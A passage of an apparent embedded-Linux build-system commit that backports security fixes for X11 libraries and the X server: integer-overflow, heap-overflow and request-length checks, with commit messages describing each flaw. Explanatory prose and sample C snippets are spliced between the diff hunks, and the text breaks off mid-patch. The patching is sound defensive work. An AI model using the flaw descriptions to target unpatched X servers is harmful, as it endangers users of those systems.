+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0003-XPutImage-clip-images-to-maximum-height-width-allowe.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/73a37d5f2fcadd6540159b432a70d80f442ddf4a]
+CVE: CVE-2023-43786
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/PutImage.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/src/PutImage.c b/src/PutImage.c
+index a6db7b42..ba411e36 100644
+--- a/src/PutImage.c
++++ b/src/PutImage.c
+@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
+ #include "Xlibint.h"
+ #include "Xutil.h"
+ #include <stdio.h>
++#include <limits.h>
+ #include "Cr.h"
+ #include "ImUtil.h"
+ #include "reallocarray.h"
+@@ -962,6 +963,10 @@ XPutImage (
+ height = image->height - req_yoffset;
+ if ((width <= 0) || (height <= 0))
+ return 0;
++ if (width > USHRT_MAX)
++ width = USHRT_MAX;
++ if (height > USHRT_MAX)
++ height = USHRT_MAX;
+
+ if ((image->bits_per_pixel == 1) || (image->format != ZPixmap)) {
+ dest_bits_per_pixel = 1;
+--
+2.39.3
+
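Since both the PutImage request and X drawables cap dimensions at 16 bits, clamping oversized width and height to USHRT_MAX is enough here. A one-line illustration of the clamp, outside any Xlib context:

    #include <limits.h>

    static int clamp_to_card16(int dim)
    {
        return dim > USHRT_MAX ? USHRT_MAX : dim;
    }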
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch
new file mode 100644
index 0000000000..d35d96c4dc
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch
@@ -0,0 +1,52 @@
+From b4031fc023816aca07fbd592ed97010b9b48784b Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 16:12:27 -0700
+Subject: [PATCH libX11 4/5] XCreatePixmap: trigger BadValue error for
+ out-of-range dimensions
+
+The CreatePixmap request specifies height & width of the image as CARD16
+(unsigned 16-bit integer), so if either is larger than that, set it to 0
+so the X server returns a BadValue error as the protocol requires.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0004-XCreatePixmap-trigger-BadValue-error-for-out-of-rang.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/b4031fc023816aca07fbd592ed97010b9b48784b]
+CVE: CVE-2023-43787
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/CrPixmap.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/src/CrPixmap.c b/src/CrPixmap.c
+index cdf31207..3cb2ca6d 100644
+--- a/src/CrPixmap.c
++++ b/src/CrPixmap.c
+@@ -28,6 +28,7 @@ in this Software without prior written authorization from The Open Group.
+ #include <config.h>
+ #endif
+ #include "Xlibint.h"
++#include <limits.h>
+
+ #ifdef USE_DYNAMIC_XCURSOR
+ void
+@@ -47,6 +48,16 @@ Pixmap XCreatePixmap (
+ Pixmap pid;
+ register xCreatePixmapReq *req;
+
++ /*
++ * Force a BadValue X Error if the requested dimensions are larger
++ * than the X11 protocol has room for, since that's how callers expect
++ * to get notified of errors.
++ */
++ if (width > USHRT_MAX)
++ width = 0;
++ if (height > USHRT_MAX)
++ height = 0;
++
+ LockDisplay(dpy);
+ GetReq(CreatePixmap, req);
+ req->drawable = d;
+--
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch
new file mode 100644
index 0000000000..110bd445df
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch
@@ -0,0 +1,64 @@
+From 7916869d16bdd115ac5be30a67c3749907aea6a0 Mon Sep 17 00:00:00 2001
+From: Yair Mizrahi <yairm@jfrog.com>
+Date: Thu, 7 Sep 2023 16:15:32 -0700
+Subject: [PATCH libX11 5/5] CVE-2023-43787: Integer overflow in XCreateImage()
+ leading to a heap overflow
+
+When the format is `Pixmap` it calculates the size of the image data as:
+ ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
+There is no validation on the `width` of the image, and so this
+calculation exceeds the capacity of a 4-byte integer, causing an overflow.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0005-CVE-2023-43787-Integer-overflow-in-XCreateImage-lead.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/7916869d16bdd115ac5be30a67c3749907aea6a0]
+CVE: CVE-2023-43787
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/ImUtil.c | 20 +++++++++++++++-----
+ 1 file changed, 15 insertions(+), 5 deletions(-)
+
+diff --git a/src/ImUtil.c b/src/ImUtil.c
+index 36f08a03..fbfad33e 100644
+--- a/src/ImUtil.c
++++ b/src/ImUtil.c
+@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
+ #include <X11/Xlibint.h>
+ #include <X11/Xutil.h>
+ #include <stdio.h>
++#include <limits.h>
+ #include "ImUtil.h"
+
+ static int _XDestroyImage(XImage *);
+@@ -361,13 +362,22 @@ XImage *XCreateImage (
+ /*
+ * compute per line accelerator.
+ */
+- {
+- if (format == ZPixmap)
++ if (format == ZPixmap) {
++ if ((INT_MAX / bits_per_pixel) < width) {
++ Xfree(image);
++ return NULL;
++ }
++
+ min_bytes_per_line =
+- ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
+- else
++ ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
++ } else {
++ if ((INT_MAX - offset) < width) {
++ Xfree(image);
++ return NULL;
++ }
++
+ min_bytes_per_line =
+- ROUNDUP((width + offset), image->bitmap_pad);
++ ROUNDUP((width + offset), image->bitmap_pad);
+ }
+ if (image_bytes_per_line == 0) {
+ image->bytes_per_line = min_bytes_per_line;
+--
+2.39.3
+
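The key pattern in this last libX11 patch is testing the multiplication against INT_MAX before performing it, because bits_per_pixel * width later determines how much heap is allocated for the image. A standalone sketch of that guard:

    #include <limits.h>

    /* Store bits_per_pixel * width in *out, or fail if the product
     * cannot be represented in an int. */
    static int scanline_bits(int bits_per_pixel, int width, int *out)
    {
        if (bits_per_pixel <= 0 || width < 0)
            return -1;
        if (width > INT_MAX / bits_per_pixel)
            return -1;                  /* multiplication would overflow */
        *out = bits_per_pixel * width;
        return 0;
    }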
diff --git a/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb b/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
index ebd2640743..248889a1d4 100644
--- a/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
+++ b/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
@@ -15,6 +15,15 @@ SRC_URI += "file://Fix-hanging-issue-in-_XReply.patch \
file://libx11-whitespace.patch \
file://CVE-2020-14344.patch \
file://CVE-2020-14363.patch \
+ file://CVE-2021-31535.patch \
+ file://CVE-2022-3554.patch \
+ file://CVE-2022-3555.patch \
+ file://CVE-2023-3138.patch \
+ file://CVE-2023-43785.patch \
+ file://CVE-2023-43786-1.patch \
+ file://CVE-2023-43786-2.patch \
+ file://CVE-2023-43787-1.patch \
+ file://CVE-2023-43787-2.patch \
"
SRC_URI[md5sum] = "55adbfb6d4370ecac5e70598c4e7eed2"
diff --git a/meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb b/meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb
index fda8e32d2c..4694f911be 100644
--- a/meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb
+++ b/meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb
@@ -11,17 +11,18 @@ an extension of the monochrome XBM bitmap specificied in the X \
protocol."
LICENSE = "MIT"
-LIC_FILES_CHKSUM = "file://COPYING;md5=51f4270b012ecd4ab1a164f5f4ed6cf7"
+LIC_FILES_CHKSUM = "file://COPYING;md5=903942ebc9d807dfb68540f40bae5aff"
DEPENDS += "libxext libsm libxt gettext-native"
PE = "1"
XORG_PN = "libXpm"
+XORG_EXT = "tar.xz"
+EXTRA_OECONF += "--disable-open-zfile"
PACKAGES =+ "sxpm cxpm"
FILES_cxpm = "${bindir}/cxpm"
FILES_sxpm = "${bindir}/sxpm"
-SRC_URI[md5sum] = "6f0ecf8d103d528cfc803aa475137afa"
-SRC_URI[sha256sum] = "9cd1da57588b6cb71450eff2273ef6b657537a9ac4d02d0014228845b935ac25"
+SRC_URI[sha256sum] = "64b31f81019e7d388c822b0b28af8d51c4622b83f1f0cb6fa3fc95e271226e43"
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb b/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
index cc45696530..38cab99bbe 100644
--- a/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
+++ b/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
@@ -6,7 +6,7 @@ using file descriptor passing."
require xorg-lib-common.inc
-LICENSE = "MIT-style"
+LICENSE = "HPND"
LIC_FILES_CHKSUM = "file://COPYING;md5=47e508ca280fde97906eacb77892c3ac"
DEPENDS += "virtual/libx11"
diff --git a/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch b/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch
new file mode 100644
index 0000000000..d54ae16b33
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch
@@ -0,0 +1,34 @@
+CVE: CVE-2022-44638
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+Signed-off-by:Bhabu Bindu <bhabu.bindu@kpit.com>
+
+From a1f88e842e0216a5b4df1ab023caebe33c101395 Mon Sep 17 00:00:00 2001
+From: Matt Turner <mattst88@gmail.com>
+Date: Wed, 2 Nov 2022 12:07:32 -0400
+Subject: [PATCH] Avoid integer overflow leading to out-of-bounds write
+
+Thanks to Maddie Stone and Google's Project Zero for discovering this
+issue, providing a proof-of-concept, and a great analysis.
+
+Closes: https://gitlab.freedesktop.org/pixman/pixman/-/issues/63
+---
+ pixman/pixman-trap.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/pixman/pixman-trap.c b/pixman/pixman-trap.c
+index 91766fd..7560405 100644
+--- a/pixman/pixman-trap.c
++++ b/pixman/pixman-trap.c
+@@ -74,7 +74,7 @@ pixman_sample_floor_y (pixman_fixed_t y,
+
+ if (f < Y_FRAC_FIRST (n))
+ {
+- if (pixman_fixed_to_int (i) == 0x8000)
++ if (pixman_fixed_to_int (i) == 0xffff8000)
+ {
+ f = 0; /* saturate */
+ }
+--
+GitLab
+
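The pixman change is a single constant, but it hinges on sign extension: pixman_fixed_to_int() of the most negative 16.16 value yields -32768, whose bit pattern is 0xffff8000, so a comparison against 0x8000 never fires and the saturation path is skipped. A small demonstration, assuming the usual 16.16 fixed-point definitions and an arithmetic right shift of negative values (as pixman itself assumes):

    #include <stdint.h>
    #include <stdio.h>

    typedef int32_t pixman_fixed_t;
    #define pixman_fixed_to_int(f)  ((int) ((f) >> 16))

    int main(void)
    {
        pixman_fixed_t y = INT32_MIN;   /* -32768 in 16.16 fixed point */

        printf("== 0x8000     -> %d\n", pixman_fixed_to_int(y) == 0x8000);     /* 0 */
        printf("== 0xffff8000 -> %d\n", pixman_fixed_to_int(y) == 0xffff8000); /* 1 */
        return 0;
    }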
diff --git a/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb b/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
index 22e19ba069..5873c19bab 100644
--- a/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
+++ b/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
@@ -10,6 +10,7 @@ DEPENDS = "zlib"
SRC_URI = "https://www.cairographics.org/releases/${BP}.tar.gz \
file://0001-ARM-qemu-related-workarounds-in-cpu-features-detecti.patch \
file://0001-test-utils-Check-for-FE_INVALID-definition-before-us.patch \
+ file://CVE-2022-44638.patch \
"
SRC_URI[md5sum] = "267a7af290f93f643a1bc74490d9fdd1"
SRC_URI[sha256sum] = "da66d6fd6e40aee70f7bd02e4f8f76fc3f006ec879d346bae6a723025cfbdde7"
diff --git a/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc b/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
index a566eaa45e..1e8525d874 100644
--- a/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
+++ b/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
@@ -6,8 +6,9 @@ LICENSE = "MIT-X"
DEPENDS = "util-macros"
XORG_PN = "${BPN}"
+XORG_EXT ?= "tar.bz2"
-SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.tar.bz2"
+SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.${XORG_EXT}"
S = "${WORKDIR}/${XORG_PN}-${PV}"
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc b/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
index b4f0760176..ce57982a7d 100644
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
@@ -16,9 +16,17 @@ PE = "2"
INC_PR = "r8"
XORG_PN = "xorg-server"
-SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.bz2"
-
-CVE_PRODUCT = "xorg-server"
+SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.gz"
+
+CVE_PRODUCT = "xorg-server x_server"
+# This is specific to Debian's xserver-wrapper.c
+CVE_CHECK_WHITELIST += "CVE-2011-4613"
+# As per upstream, exploiting this flaw is non-trivial and it requires exact
+# timing on the behalf of the attacker. Many graphical applications exit if their
+# connection to the X server is lost, so a typical desktop session is either
+# impossible or difficult to exploit. There is currently no upstream patch
+# available for this flaw.
+CVE_CHECK_WHITELIST += "CVE-2020-25697"
S = "${WORKDIR}/${XORG_PN}-${PV}"
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch
deleted file mode 100644
index 4994a21d33..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From c940cc8b6c0a2983c1ec974f1b3f019795dd4cff Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:49:04 +0200
-Subject: [PATCH] Fix XIChangeHierarchy() integer underflow
-
-CVE-2020-14346 / ZDI-CAN-11429
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/c940cc8b6c0a2983c1ec974f1b3f019795dd4cff]
-CVE: CVE-2020-14346
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- Xi/xichangehierarchy.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
-index cbdd91258..504defe56 100644
---- a/Xi/xichangehierarchy.c
-+++ b/Xi/xichangehierarchy.c
-@@ -423,7 +423,7 @@ ProcXIChangeHierarchy(ClientPtr client)
- if (!stuff->num_changes)
- return rc;
-
-- len = ((size_t)stuff->length << 2) - sizeof(xXIChangeHierarchyReq);
-+ len = ((size_t)client->req_len << 2) - sizeof(xXIChangeHierarchyReq);
-
- any = (xXIAnyHierarchyChangeInfo *) &stuff[1];
- while (stuff->num_changes--) {
---
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch
deleted file mode 100644
index cf3f5f9417..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From aac28e162e5108510065ad4c323affd6deffd816 Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Sat, 25 Jul 2020 19:33:50 +0200
-Subject: [PATCH] fix for ZDI-11426
-
-Avoid leaking un-initalized memory to clients by zeroing the
-whole pixmap on initial allocation.
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-Reviewed-by: Alan Coopersmith <alan.coopersmith@oracle.com>
-
-
-Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/aac28e162e5108510065ad4c323affd6deffd816]
-CVE: CVE-2020-14347
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- dix/pixmap.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/dix/pixmap.c b/dix/pixmap.c
-index 1186d7dbbf..5a0146bbb6 100644
---- a/dix/pixmap.c
-+++ b/dix/pixmap.c
-@@ -116,7 +116,7 @@ AllocatePixmap(ScreenPtr pScreen, int pixDataSize)
- if (pScreen->totalPixmapSize > ((size_t) - 1) - pixDataSize)
- return NullPixmap;
-
-- pPixmap = malloc(pScreen->totalPixmapSize + pixDataSize);
-+ pPixmap = calloc(1, pScreen->totalPixmapSize + pixDataSize);
- if (!pPixmap)
- return NullPixmap;
-
---
-GitLab
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch
deleted file mode 100644
index 710cc3873c..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 144849ea27230962227e62a943b399e2ab304787 Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:52:29 +0200
-Subject: [PATCH] Fix XkbSelectEvents() integer underflow
-
-CVE-2020-14361 ZDI-CAN 11573
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/144849ea27230962227e62a943b399e2ab304787]
-CVE: CVE-2020-14361
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- xkb/xkbSwap.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/xkb/xkbSwap.c b/xkb/xkbSwap.c
-index 1c1ed5ff4..50cabb90e 100644
---- a/xkb/xkbSwap.c
-+++ b/xkb/xkbSwap.c
-@@ -76,7 +76,7 @@ SProcXkbSelectEvents(ClientPtr client)
- register unsigned bit, ndx, maskLeft, dataLeft, size;
-
- from.c8 = (CARD8 *) &stuff[1];
-- dataLeft = (stuff->length * 4) - SIZEOF(xkbSelectEventsReq);
-+ dataLeft = (client->req_len * 4) - SIZEOF(xkbSelectEventsReq);
- maskLeft = (stuff->affectWhich & (~XkbMapNotifyMask));
- for (ndx = 0, bit = 1; (maskLeft != 0); ndx++, bit <<= 1) {
- if (((bit & maskLeft) == 0) || (ndx == XkbMapNotify))
---
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
deleted file mode 100644
index 2103e9c198..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 2902b78535ecc6821cc027351818b28a5c7fdbdc Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:55:01 +0200
-Subject: [PATCH] Fix XRecordRegisterClients() Integer underflow
-
-CVE-2020-14362 ZDI-CAN-11574
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/2902b78535ecc6821cc027351818b28a5c7fdbdc]
-CVE: CVE-2020-14362
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- record/record.c | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
-
-diff --git a/record/record.c b/record/record.c
-index f2d38c877..be154525d 100644
---- a/record/record.c
-+++ b/record/record.c
-@@ -2500,7 +2500,7 @@ SProcRecordQueryVersion(ClientPtr client)
- } /* SProcRecordQueryVersion */
-
- static int _X_COLD
--SwapCreateRegister(xRecordRegisterClientsReq * stuff)
-+SwapCreateRegister(ClientPtr client, xRecordRegisterClientsReq * stuff)
- {
- int i;
- XID *pClientID;
-@@ -2510,13 +2510,13 @@ SwapCreateRegister(xRecordRegisterClientsReq * stuff)
- swapl(&stuff->nRanges);
- pClientID = (XID *) &stuff[1];
- if (stuff->nClients >
-- stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq))
-+ client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq))
- return BadLength;
- for (i = 0; i < stuff->nClients; i++, pClientID++) {
- swapl(pClientID);
- }
- if (stuff->nRanges >
-- stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq)
-+ client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq)
- - stuff->nClients)
- return BadLength;
- RecordSwapRanges((xRecordRange *) pClientID, stuff->nRanges);
-@@ -2531,7 +2531,7 @@ SProcRecordCreateContext(ClientPtr client)
-
- swaps(&stuff->length);
- REQUEST_AT_LEAST_SIZE(xRecordCreateContextReq);
-- if ((status = SwapCreateRegister((void *) stuff)) != Success)
-+ if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
- return status;
- return ProcRecordCreateContext(client);
- } /* SProcRecordCreateContext */
-@@ -2544,7 +2544,7 @@ SProcRecordRegisterClients(ClientPtr client)
-
- swaps(&stuff->length);
- REQUEST_AT_LEAST_SIZE(xRecordRegisterClientsReq);
-- if ((status = SwapCreateRegister((void *) stuff)) != Success)
-+ if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
- return status;
- return ProcRecordRegisterClients(client);
- } /* SProcRecordRegisterClients */
---
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
new file mode 100644
index 0000000000..efec7b6b4e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
@@ -0,0 +1,40 @@
+From d2dcbdc67c96c84dff301505072b0b7b022f1a14 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Sun, 4 Dec 2022 17:40:21 +0000
+Subject: [PATCH 1/3] xkb: proof GetCountedString against request length
+ attacks
+
+GetCountedString did a check for the whole string to be within the
+request buffer but not for the initial 2 bytes that contain the length
+field. A swapped client could send a malformed request to trigger a
+swaps() on those bytes, writing into random memory.
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=11beef0b7f1ed290348e45618e5fa0d2bffcb72e]
+CVE: CVE-2022-3550
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+
+---
+ xkb/xkb.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/xkb/xkb.c b/xkb/xkb.c
+index 68c59df..bf8aaa3 100644
+--- a/xkb/xkb.c
++++ b/xkb/xkb.c
+@@ -5138,6 +5138,11 @@ _GetCountedString(char **wire_inout, ClientPtr client, char **str)
+ CARD16 len;
+
+ wire = *wire_inout;
++
++ if (client->req_len <
++ bytes_to_int32(wire + 2 - (char *) client->requestBuffer))
++ return BadValue;
++
+ len = *(CARD16 *) wire;
+ if (client->swapped) {
+ swaps(&len);
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
new file mode 100644
index 0000000000..a3b977aac9
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
@@ -0,0 +1,64 @@
+From d3787290f56165f5656ddd2123dbf676a32d0a68 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Sun, 4 Dec 2022 17:44:00 +0000
+Subject: [PATCH 2/3] xkb: fix some possible memleaks in XkbGetKbdByName
+
+GetComponentByName returns an allocated string, so let's free that if we
+fail somewhere.
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=18f91b950e22c2a342a4fbc55e9ddf7534a707d2]
+CVE: CVE-2022-3551
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+
+---
+ xkb/xkb.c | 26 +++++++++++++++++++-------
+ 1 file changed, 19 insertions(+), 7 deletions(-)
+
+diff --git a/xkb/xkb.c b/xkb/xkb.c
+index bf8aaa3..f79d306 100644
+--- a/xkb/xkb.c
++++ b/xkb/xkb.c
+@@ -5908,19 +5908,31 @@ ProcXkbGetKbdByName(ClientPtr client)
+ xkb = dev->key->xkbInfo->desc;
+ status = Success;
+ str = (unsigned char *) &stuff[1];
+- if (GetComponentSpec(&str, TRUE, &status)) /* keymap, unsupported */
+- return BadMatch;
++ {
++ char *keymap = GetComponentSpec(&str, TRUE, &status); /* keymap, unsupported */
++ if (keymap) {
++ free(keymap);
++ return BadMatch;
++ }
++ }
+ names.keycodes = GetComponentSpec(&str, TRUE, &status);
+ names.types = GetComponentSpec(&str, TRUE, &status);
+ names.compat = GetComponentSpec(&str, TRUE, &status);
+ names.symbols = GetComponentSpec(&str, TRUE, &status);
+ names.geometry = GetComponentSpec(&str, TRUE, &status);
+- if (status != Success)
+- return status;
+- len = str - ((unsigned char *) stuff);
+- if ((XkbPaddedSize(len) / 4) != stuff->length)
+- return BadLength;
++ if (status == Success) {
++ len = str - ((unsigned char *) stuff);
++ if ((XkbPaddedSize(len) / 4) != stuff->length)
++ status = BadLength;
++ }
+
++ if (status != Success) {
++ free(names.keycodes);
++ free(names.types);
++ free(names.compat);
++ free(names.symbols);
++ free(names.geometry);
++ }
+ CHK_MASK_LEGAL(0x01, stuff->want, XkbGBN_AllComponentsMask);
+ CHK_MASK_LEGAL(0x02, stuff->need, XkbGBN_AllComponentsMask);
+
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
new file mode 100644
index 0000000000..94cea77edc
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
@@ -0,0 +1,49 @@
+From 57ad2c03730d56f8432b6d66b29c0e5a9f9b1ec2 Mon Sep 17 00:00:00 2001
+From: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
+Date: Sun, 4 Dec 2022 17:46:18 +0000
+Subject: [PATCH 3/3] xquartz: Fix a possible crash when editing the
+ Application menu due to mutating immutable arrays
+
+Crashing on exception: -[__NSCFArray replaceObjectAtIndex:withObject:]: mutating method sent to immutable object
+
+Application Specific Backtrace 0:
+0 CoreFoundation 0x00007ff80d2c5e9b __exceptionPreprocess + 242
+1 libobjc.A.dylib 0x00007ff80d027e48 objc_exception_throw + 48
+2 CoreFoundation 0x00007ff80d38167b _CFThrowFormattedException + 194
+3 CoreFoundation 0x00007ff80d382a25 -[__NSCFArray removeObjectAtIndex:].cold.1 + 0
+4 CoreFoundation 0x00007ff80d2e6c0b -[__NSCFArray replaceObjectAtIndex:withObject:] + 119
+5 X11.bin 0x00000001003180f9 -[X11Controller tableView:setObjectValue:forTableColumn:row:] + 169
+
+Fixes: https://github.com/XQuartz/XQuartz/issues/267
+Signed-off-by: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=dfd057996b26420309c324ec844a5ba6dd07eda3]
+CVE: CVE-2022-3553
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+
+---
+ hw/xquartz/X11Controller.m | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/hw/xquartz/X11Controller.m b/hw/xquartz/X11Controller.m
+index 3efda50..9870ff2 100644
+--- a/hw/xquartz/X11Controller.m
++++ b/hw/xquartz/X11Controller.m
+@@ -467,8 +467,12 @@ extern char *bundle_id_prefix;
+ self.table_apps = table_apps;
+
+ NSArray * const apps = self.apps;
+- if (apps != nil)
